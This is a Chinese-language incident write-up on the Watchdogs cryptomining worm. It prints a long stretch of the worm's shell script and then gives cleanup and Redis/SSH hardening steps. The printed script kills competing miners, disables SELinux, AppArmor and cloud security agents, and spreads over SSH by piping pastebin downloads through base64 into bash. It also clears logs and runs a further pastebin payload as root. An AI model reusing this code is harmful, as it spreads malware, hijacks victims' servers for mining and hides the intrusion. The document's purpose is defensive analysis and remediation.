xargs -I % kill -9 % 410 netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % 411 netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % 412 pgrep -f monerohash | xargs -I % kill -9 % 413 pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 % 414 pgrep -f xzpauectgr | xargs -I % kill -9 % 415 pgrep -f slxfbkmxtd | xargs -I % kill -9 % 416 pgrep -f mixtape | xargs -I % kill -9 % 417 pgrep -f addnj | xargs -I % kill -9 % 418 pgrep -f 200.68.17.196 | xargs -I % kill -9 % 419 pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 % 420 pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 % 421 pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 % 422 pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 % 423 pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 % 424 pgrep -f honvbsasbf.conf | xargs -I % kill -9 % 425 pgrep -f mqdsflm.cf | xargs -I % kill -9 % 426 pgrep -f stratum | xargs -I % kill -9 % 427 pgrep -f lower.sh | xargs -I % kill -9 % 428 pgrep -f ./ppp | xargs -I % kill -9 % 429 pgrep -f cryptonight | xargs -I % kill -9 % 430 pgrep -f ./seervceaess | xargs -I % kill -9 % 431 pgrep -f ./servceaess | xargs -I % kill -9 % 432 pgrep -f ./servceas | xargs -I % kill -9 % 433 pgrep -f ./servcesa | xargs -I % kill -9 % 434 pgrep -f ./vsp | xargs -I % kill -9 % 435 pgrep -f ./jvs | xargs -I % kill -9 % 436 pgrep -f ./pvv | xargs -I % kill -9 % 437 pgrep -f ./vpp | xargs -I % kill -9 % 438 pgrep -f ./pces | xargs -I % kill -9 % 439 pgrep -f ./rspce | xargs -I % kill -9 % 440 pgrep -f ./haveged | xargs -I % kill -9 % 441 pgrep -f ./jiba | xargs -I % kill -9 % 442 pgrep -f ./watchbog | xargs -I % kill -9 % 443 pgrep -f ./A7mA5gb | xargs -I % kill -9 % 444 pgrep -f kacpi_svc | xargs -I % kill -9 % 445 pgrep -f kswap_svc | xargs -I % kill -9 % 446 pgrep -f kauditd_svc | xargs -I % kill -9 % 447 pgrep -f kpsmoused_svc | xargs -I % kill -9 % 448 pgrep -f kseriod_svc | xargs -I % kill -9 % 449 pgrep -f kthreadd_svc | xargs -I % kill -9 % 450 pgrep -f ksoftirqd_svc | xargs -I % kill -9 % 451 pgrep -f kintegrityd_svc | xargs -I % kill -9 % 452 pgrep -f jawa | xargs -I % kill -9 % 453 pgrep -f oracle.jpg | xargs -I % kill -9 % 454 pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 % 455 pgrep -f 188.209.49.54 | xargs -I % kill -9 % 456 pgrep -f 181.214.87.241 | xargs -I % kill -9 % 457 pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 % 458 pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 % 459 pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 % 460 pgrep -f servim | xargs -I % kill -9 % 461 pgrep -f kblockd_svc | xargs -I % kill -9 % 462 pgrep -f native_svc | xargs -I % kill -9 % 463 pgrep -f ynn | xargs -I % kill -9 % 464 pgrep -f 65ccEJ7 | xargs -I % kill -9 % 465 pgrep -f jmxx | xargs -I % kill -9 % 466 pgrep -f 2Ne80nA | xargs -I % kill -9 % 467 pgrep -f sysstats | xargs -I % kill -9 % 468 pgrep -f systemxlv | xargs -I % kill -9 % 469 pgrep -f watchbog | xargs -I % kill -9 % 470 pgrep -f OIcJi1m | xargs -I % kill -9 % 471 pkill -f biosetjenkins 472 pkill -f Loopback 473 pkill -f apaceha 474 pkill -f cryptonight 475 pkill -f stratum 476 pkill -f mixnerdx 477 pkill -f performedl 478 pkill -f JnKihGjn 479 pkill -f irqba2anc1 480 pkill -f irqba5xnc1 481 pkill -f irqbnc1 482 pkill -f ir29xc1 483 pkill -f conns 484 pkill -f irqbalance 485 pkill -f crypto-pool 486 pkill -f XJnRj 487 pkill -f mgwsl 488 pkill -f pythno 489 pkill -f jweri 490 pkill -f lx26 491 pkill -f NXLAi 492 pkill -f BI5zj 493 pkill -f askdljlqw 494 pkill -f minerd 495 pkill -f minergate 496 pkill -f Guard.sh 497 pkill -f ysaydh 498 pkill -f bonns 499 pkill -f donns 500 pkill -f kxjd 501 pkill -f Duck.sh 502 pkill -f bonn.sh 503 pkill -f conn.sh 504 pkill -f kworker34 505 pkill -f kw.sh 506 pkill -f pro.sh 507 pkill -f polkitd 508 pkill -f acpid 509 pkill -f icb5o 510 pkill -f nopxi 511 pkill -f irqbalanc1 512 pkill -f minerd 513 pkill -f i586 514 pkill -f gddr 515 pkill -f mstxmr 516 pkill -f ddg.2011 517 pkill -f wnTKYg 518 pkill -f deamon 519 pkill -f disk_genius 520 pkill -f sourplum 521 pkill -f polkitd 522 pkill -f nanoWatch 523 pkill -f zigw 524 pkill -f devtool 525 pkill -f devtools 526 pkill -f systemctI 527 pkill -f watchbog 528 pkill -f cryptonight 529 pkill -f sustes 530 pkill -f xmrig 531 pkill -f xmrig-cpu 532 pkill -f 121.42.151.137 533 pkill -f init12.cfg 534 pkill -f nginxk 535 pkill -f tmp/wc.conf 536 pkill -f xmrig-notls 537 pkill -f xmr-stak 538 pkill -f suppoie 539 pkill -f zer0day.ru 540 pkill -f dbus-daemon--system 541 pkill -f nullcrew 542 pkill -f systemctI 543 pkill -f kworkerds 544 pkill -f init10.cfg 545 pkill -f /wl.conf 546 pkill -f crond64 547 pkill -f sustse 548 pkill -f vmlinuz 549 pkill -f exin 550 pkill -f apachiii 551 pkill -f networkservics 552 rm -rf /usr/bin/config.json 553 rm -rf /usr/bin/exin 554 rm -rf /tmp/wc.conf 555 rm -rf /tmp/log_rot 556 rm -rf /tmp/apachiii 557 rm -rf /tmp/sustse 558 rm -rf /tmp/php 559 rm -rf /tmp/p2.conf 560 rm -rf /tmp/pprt 561 rm -rf /tmp/ppol 562 rm -rf /tmp/javax/config.sh 563 rm -rf /tmp/javax/sshd2 564 rm -rf /tmp/.profile 565 rm -rf /tmp/1.so 566 rm -rf /tmp/kworkerds 567 rm -rf /tmp/kworkerds3 568 rm -rf /tmp/kworkerdssx 569 rm -rf /tmp/xd.json 570 rm -rf /tmp/syslogd 571 rm -rf /tmp/syslogdb 572 rm -rf /tmp/65ccEJ7 573 rm -rf /tmp/jmxx 574 rm -rf /tmp/2Ne80nA 575 rm -rf /tmp/dl 576 rm -rf /tmp/ddg 577 rm -rf /tmp/systemxlv 578 rm -rf /tmp/systemctI 579 rm -rf /tmp/.abc 580 rm -rf /tmp/osw.hb 581 rm -rf /tmp/.tmpleve 582 rm -rf /tmp/.tmpnewzz 583 rm -rf /tmp/.java 584 rm -rf /tmp/.omed 585 rm -rf /tmp/.tmpc 586 rm -rf /tmp/.tmpleve 587 rm -rf /tmp/.tmpnewzz 588 rm -rf /tmp/gates.lod 589 rm -rf /tmp/conf.n 590 rm -rf /tmp/devtool 591 rm -rf /tmp/devtools 592 rm -rf /tmp/fs 593 rm -rf /tmp/.rod 594 rm -rf /tmp/.rod.tgz 595 rm -rf /tmp/.rod.tgz.1 596 rm -rf /tmp/.rod.tgz.2 597 rm -rf /tmp/.mer 598 rm -rf /tmp/.mer.tgz 599 rm -rf /tmp/.mer.tgz.1 600 rm -rf /tmp/.hod 601 rm -rf /tmp/.hod.tgz 602 rm -rf /tmp/.hod.tgz.1 603 rm -rf /tmp/84Onmce 604 rm -rf /tmp/C4iLM4L 605 rm -rf /tmp/lilpip 606 rm -rf /tmp/3lmigMo 607 rm -rf /tmp/am8jmBP 608 rm -rf /tmp/tmp.txt 609 rm -rf /tmp/baby 610 rm -rf /tmp/.lib 611 rm -rf /tmp/systemd 612 rm -rf /tmp/lib.tar.gz 613 rm -rf /tmp/baby 614 rm -rf /tmp/java 615 rm -rf /tmp/j2.conf 616 rm -rf /tmp/.mynews1234 617 rm -rf /tmp/a3e12d 618 rm -rf /tmp/.pt 619 rm -rf /tmp/.pt.tgz 620 rm -rf /tmp/.pt.tgz.1 621 rm -rf /tmp/go 622 rm -rf /tmp/java 623 rm -rf /tmp/j2.conf 624 rm -rf /tmp/.tmpnewasss 625 rm -rf /tmp/java 626 rm -rf /tmp/go.sh 627 rm -rf /tmp/go2.sh 628 rm -rf /tmp/khugepageds 629 rm -rf /tmp/.censusqqqqqqqqq 630 rm -rf /tmp/.kerberods 631 rm -rf /tmp/kerberods 632 rm -rf /tmp/seasame 633 rm -rf /tmp/touch 634 rm -rf /tmp/.p 635 rm -rf /tmp/runtime2.sh 636 rm -rf /tmp/runtime.sh 637 rm -rf /dev/shm/z3.sh 638 rm -rf /dev/shm/z2.sh 639 rm -rf /dev/shm/.scr 640 rm -rf /dev/shm/.kerberods 641 rm -f /etc/ld.so.preload 642 rm -f /usr/local/lib/libioset.so 643 chattr -i /etc/ld.so.preload 644 rm -f /etc/ld.so.preload 645 rm -f /usr/local/lib/libioset.so 646 rm -rf /tmp/watchdogs 647 rm -rf /etc/cron.d/tomcat 648 rm -rf /etc/rc.d/init.d/watchdogs 649 rm -rf /usr/sbin/watchdogs 650 rm -f /tmp/kthrotlds 651 rm -f /etc/rc.d/init.d/kthrotlds 652 rm -rf /tmp/.sysbabyuuuuu12 653 rm -rf /tmp/logo9.jpg 654 rm -rf /tmp/miner.sh 655 rm -rf /tmp/nullcrew 656 rm -rf /tmp/proc 657 rm -rf /tmp/2.sh 658 rm /opt/atlassian/confluence/bin/1.sh 659 rm /opt/atlassian/confluence/bin/1.sh.1 660 rm /opt/atlassian/confluence/bin/1.sh.2 661 rm /opt/atlassian/confluence/bin/1.sh.3 662 rm /opt/atlassian/confluence/bin/3.sh 663 rm /opt/atlassian/confluence/bin/3.sh.1 664 rm /opt/atlassian/confluence/bin/3.sh.2 665 rm /opt/atlassian/confluence/bin/3.sh.3 666 rm -rf /var/tmp/f41 667 rm -rf /var/tmp/2.sh 668 rm -rf /var/tmp/config.json 669 rm -rf /var/tmp/xmrig 670 rm -rf /var/tmp/1.so 671 rm -rf /var/tmp/kworkerds3 672 rm -rf /var/tmp/kworkerdssx 673 rm -rf /var/tmp/kworkerds 674 rm -rf /var/tmp/wc.conf 675 rm -rf /var/tmp/nadezhda. 676 rm -rf /var/tmp/nadezhda.arm 677 rm -rf /var/tmp/nadezhda.arm.1 678 rm -rf /var/tmp/nadezhda.arm.2 679 rm -rf /var/tmp/nadezhda.x86_64 680 rm -rf /var/tmp/nadezhda.x86_64.1 681 rm -rf /var/tmp/nadezhda.x86_64.2 682 rm -rf /var/tmp/sustse3 683 rm -rf /var/tmp/sustse 684 rm -rf /var/tmp/moneroocean/ 685 rm -rf /var/tmp/devtool 686 rm -rf /var/tmp/devtools 687 rm -rf /var/tmp/play.sh 688 rm -rf /var/tmp/systemctI 689 rm -rf /var/tmp/.java 690 rm -rf /var/tmp/1.sh 691 rm -rf /var/tmp/conf.n 692 rm -r /var/tmp/lib 693 rm -r /var/tmp/.lib 694 chattr -iau /tmp/lok 695 chmod 700 /tmp/lok 696 rm -rf /tmp/lok 697 sleep 1 698 chattr -i /tmp/kdevtmpfsi 699 echo 1 > /tmp/kdevtmpfsi 700 chattr +i /tmp/kdevtmpfsi 701 sleep 1 702 chattr -i /tmp/redis2 703 echo 1 > /tmp/redis2 704 chattr +i /tmp/redis2 705 sleep 1 706 chattr -i /usr/lib/systemd/systemd-update-daily 707 echo 1 > /usr/lib/systemd/systemd-update-daily 708 chattr +i /usr/lib/systemd/systemd-update-daily 709 #yum install -y docker.io || apt-get install docker.io; 710 docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill % 711 docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill % 712 docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill % 713 docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill % 714 docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill % 715 docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill % 716 docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill % 717 docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill % 718 docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill % 719 docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill % 720 docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill % 721 docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f % 722 docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f % 723 docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f % 724 docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f % 725 docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f % 726 docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f % 727 docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f % 728 docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f % 729 docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f % 730 docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f % 731 docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f % 732 echo SELINUX=disabled >/etc/selinux/config 733 service apparmor stop 734 systemctl disable apparmor 735 service aliyun.service stop 736 systemctl disable aliyun.service 737 ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % 738 ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % 739 } 740 741 kill_sus_proc() 742 { 743 ps axf -o "pid"|while read procid 744 do 745 ls -l /proc/$procid/exe | grep /tmp 746 if [ $? -ne 1 ] 747 then 748 cat /proc/$procid/cmdline| grep -a -E "JavaUpdates" 749 if [ $? -ne 0 ] 750 then 751 kill -9 $procid 752 else 753 echo "don't kill" 754 fi 755 fi 756 done 757 ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid 758 do 759 cat /proc/$procid/cmdline| grep -a -E "JavaUpdates" 760 if [ $? -ne 0 ] 761 then 762 kill -9 $procid 763 else 764 echo "don't kill" 765 fi 766 done 767 } 768 769 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then 770 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/UhUmR517||wget -q -O - https://pastebin.com/raw/UhUmR517)|base64 -d|bash >/dev/null 2>&1 &' & done 771 fi 772 773 kill_miner_proc 774 kill_sus_proc 775 776 function upgradeday() { 777 if [ "$me" != "root" ];then 778 bug_path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/" 779 else 780 bug_path="/bin/" 781 fi 782 if [ -f "$bug_path/JavaUpdates" ]; then 783 cd $bug_path 784 $check_type=$(./JavaUpdates -V|grep 'xmr-stak'|wc -l) 785 if [ ${check_type} -ne 0 ];then 786 $check_type_b=$(./JavaUpdates -V|grep '1.0.4-rx'|wc -l) 787 if [ ${check_type_b} -eq 0 ];then 788 cleanoldpack 789 fi 790 else 791 $check_type_a=$(./JavaUpdates -V|grep 'XMRig'|wc -l) 792 if [ ${check_type_a} -ne 0 ];then 793 $check_type_b=$(./JavaUpdates -V|grep '5.3.0'|wc -l) 794 if [ ${check_type_b} -eq 0 ];then 795 cleanoldpack 796 fi 797 else 798 cleanoldpack 799 fi 800 fi 801 else 802 cleanoldpack 803 fi 804 } 805 if [ "$me" != "root" ];then 806 pz=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 807 if [ ${pz} -ne 0 ];then 808 crontab -r 809 cronlow 810 else 811 download 812 crontab -r 813 cronlow 814 sleep 15 815 pm=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 816 if [ ${pm} -eq 0 ];then 817 testa 818 fi 819 prt=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 820 if [ ${prt} -ne 0 ];then 821 if [ ! -f "/tmp/.tmpc" ]; then 822 finished "$deep" 823 fi 824 fi 825 fi 826 else 827 pz=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 828 if [ ${pz} -ne 0 ];then 829 system 830 cronhigh 831 else 832 system 833 cronhigh 834 download 835 sleep 15 836 pm=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 837 if [ ${pm} -ne 0 ];then 838 if [ ! -f "/tmp/.tmpc" ]; then 839 finished "$surf" 840 fi 841 fi 842 sleep 30 843 if [ ${pm} -eq 0 ];then 844 testa 845 if [ ${pm} -ne 0 ];then 846 finished "$surf" 847 fi 848 fi 849 if [ ${pm} -eq 0 ];then 850 download 851 if [ ${pm} -ne 0 ];then 852 finished "$deep" 853 fi 854 fi 855 if [ ${pm} -eq 0 ];then 856 testa 857 if [ ${pm} -ne 0 ];then 858 finished "$deep" 859 fi 860 fi 861 fi 862 echo 0>/var/log/secure 863 echo 0>/var/log/cron 864 sed -i '/pastebin/d' /var/log/syslog 865 sed -i '/github/d' /var/log/syslog 866 fi 867 # 868 cronbackup 869 # 870 cronrc 871 # 872 px=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 873 if [ ${px} -gt 1 ];then 874 ps auxf|grep -v grep|grep "JavaUpdates" | awk '{print $2}'|xargs kill -9 875 fi 876 if [ `whoami` = "root" ];then 877 (curl -fsSL https://pastebin.com/raw/HS6SqV7w||wget -q -O - https://pastebin.com/raw/HS6SqV7w)|base64 -d|bash 878 fi 879 #
二:Watchdogs的清理过程
2.0.0 该病毒主要需要清理的部分为:
1) 防火墙封禁/重定向 第三方代码托管地址。
2) 清理下载shell的定时任务,与定时相关的文件和目录。
3) 删除恶意的命令与包,重命名系统中被利用的命令
4)清理JavaUpates的挖矿进程部分 。
5)修复加固此次被入侵的Redis部分。
2.0.1 防火墙封禁/重定向 第三方代码托管地址。
cat /etc/hostsvim /etc/hosts127.0.0.1 pastebin.com sadan666.xyz
将第三方地址重定向到本地,但是这里重新vim /etc/hosts时发现未被写入,有点奇怪,先跳过地址。
Ping出pastebin.com/sadan666.xyz两者IP,将IP写入防火墙。
iptables -A INPUT -s 104.23.98.190 -j DROPiptables -A OUTPUT -s 104.23.98.190 -j DROPiptables -A OUTPUT -j DROP -d 104.23.98.190iptables -A INPUT -s 104.236.66.189 -j DROPiptables -A OUTPUT -s 104.236.66.189 -j DROPiptables -A OUTPUT -j DROP -d 104.236.66.189
Centos系统: iptables-save
效果测试:
2.0.2 清理下载shell的定时任务,与定时相关的文件和目录。
2.0.2.1 查看并删除定时任务
查看:crontab -l
删除:crontab -r
其中*/9 * * * *为每9秒钟执行一次,执行为 到后续 三方地址拉取shell脚本。 
2.0.2.2 crontab -r 删除定时任务后,再查看一下,no crontab for root表示目前无定时任务。
2.0.2.3 并依次到下面地址文件夹查看是否包含潜藏命令和任务。
/etc/cron.d/etc/cron.deny/etc/cron.monthly/etc/cron.daily/etc/cron.hourly/etc/crontab/etc/cron.weekly如/etc/cron.d实例:cd /etc/cron.dllvim /etc/cron.d/apachevim /etc/cron.d/rootvim /etc/cron.d/system
将其中*/7 ****定时任务行删除。
2.0.2.4 在/etc/crontab目录下查看到有潜藏命令,并将潜藏命令httpntp、ftpdns删除。
2.0.2.5 查看并删除/bin/httpntp、/bin/ftpsdns、/usr/bin/watchbog的恶意命令
vim /bin/httpntpvim /bin/ftpsdnsvim /usr/bin/watchbog
2.0.2.6 以及一开始发现的bashrc文件。
cd ~
vim .bashrc
2.0.3 删除恶意的命令与包,重命名系统中被利用的命令。
该shell脚本会使用curl和wget命令拉取脚本,所以将curl和wget进行重命名,重命名为倒序。
mv /usr/bin/curl /usr/bin/lrucmv /usr/bin/wget /usr/bin/tegw
2.0.4 清理JavaUpates的挖矿进程部分 。
2.0.4.1 清理挖矿进程部分:
ps -ef|grep watchbog|awk '{print $2}'|xargs kill -9
ps -ef|grep JavaUpdates|awk '{print $2}'|xargs kill -9
对watchbog和JavaUpdates进程都查找一下,即使目前挖矿病毒进程在系统中为JavaUpdates。
2.0.4.2 清理完上述进程之后,CPU运行已经下降到1%,但发现还有个pnscan木马进程
top 找到pnscan 的pid
kill -9 pid
ps aux|grep pnscan
rm -rf pnscan删除目录
2.0.5 修复加固此次被入侵的Redis部分。
本次被入侵真正原因为redis当时未设置密码,并且当时redis.conf的配置为#bind 127.0.0.1,未只绑定本机,等同于被暴露在公网。
没有设置密码,等于任意用户都可以获取该redis的所有数据。攻击者利用 Redis 自身的提供的config 命令,进行读写文件操作,并成功将自己的ssh公钥
写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器 达到入侵目的。
2.0.5.1 修改如下:
1)在redis中添加密码,并修改端口。
#requirepass foobaredrequirepass password#port 6379port 9736
2) 修改redis.conf文件来禁用远程修改DB文件地址。
rename-command FLUSHALL ""rename-command CONFIG ""rename-command EVAL ""
3) 禁止除本机外其他机器访问 Redis,可选。
bind 127.0.0.1
4) 低权限运行Redis服务。
为Redis服务创建单独的user和home目录,并且配置禁止登陆。
groupadd -r redis && useradd -r -g redis redis
2.0.6 且以我以往的经验,还需切换SSH登录端口。
防止被挖矿者 对22端口进行弱密码爆破,先放出其他端口再关闭22端口。
vi /etc/ssh/sshd_config
Port xxxx
重新加载sshd_config配置:
service sshd restart
浙公网安备 33010602011771号